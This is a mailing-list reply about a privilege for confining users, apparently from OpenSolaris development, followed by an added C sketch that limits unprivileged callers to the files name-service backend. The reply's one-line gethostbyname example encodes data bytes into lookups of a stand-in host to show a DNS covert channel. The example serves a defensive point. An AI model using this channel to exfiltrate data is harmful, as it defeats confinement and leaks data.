On Thu, Dec 24, 2009 at 10:43:53AM +0100, Casper.Dik at Sun.COM wrote:
>
> >John Plocher wrote:
> >> What is the basic use case for this priv?
>
> It is also possible to contain users in a "can't break out" shell; they
> can run their application but they cannot copy data outside of the machine.

To be fair, if you allow name service calls, with nscd doing the
networking, you have a subliminal channel...

    if (gethostbyname("byte0is123.docFOO.peer.example") != NULL)
        /* peer got the message */

nscd could, of course, see that a client lacks this basic privilege and
limit the caller to queries against the files backend.  We should
consider doing that.

Nico
--
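
Added example (not part of the original message and not nscd code): a sketch of the restriction suggested above, where a caching name-service daemon limits a caller that lacks the privilege to the files backend. The function name, the boolean privilege flag and the sample source list are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: from an nsswitch.conf-style source list such as
 * "files dns [NOTFOUND=return] nis", build the list of source names a
 * caller may use.  A caller without the networking privilege is limited to
 * "files"; if "files" is not configured the result is empty, so the lookup
 * fails closed.  How the daemon learns caller_has_priv (for example from
 * the credentials of the requesting process) is assumed, not shown. */
size_t allowed_backends(const char *sources, bool caller_has_priv,
                        char *out, size_t outlen)
{
    char buf[256];
    size_t n = 0;
    bool in_crit = false;

    if (outlen == 0)
        return 0;
    out[0] = '\0';
    if (strlen(sources) >= sizeof(buf))
        return 0;                       /* oversized input: allow nothing */
    strcpy(buf, sources);
    for (char *tok = strtok(buf, " \t"); tok; tok = strtok(NULL, " \t")) {
        if (tok[0] == '[')              /* start of [STATUS=action ...] */
            in_crit = true;
        if (in_crit) {                  /* criteria may span several tokens */
            if (strchr(tok, ']'))
                in_crit = false;
            continue;
        }
        if (!caller_has_priv && strcmp(tok, "files") != 0)
            continue;                   /* source may reach the network */
        if (strlen(out) + strlen(tok) + 2 > outlen)
            break;                      /* output full: stop, no overflow */
        if (n++ > 0)
            strcat(out, " ");
        strcat(out, tok);
    }
    return n;
}

int main(void)
{
    const char *hosts = "files dns [NOTFOUND=return] nis"; /* constructed */
    char out[64];
    allowed_backends(hosts, true, out, sizeof(out));
    printf("privileged caller:   %s\n", out);
    allowed_backends(hosts, false, out, sizeof(out));
    printf("unprivileged caller: %s\n", out);
    return 0;
}
```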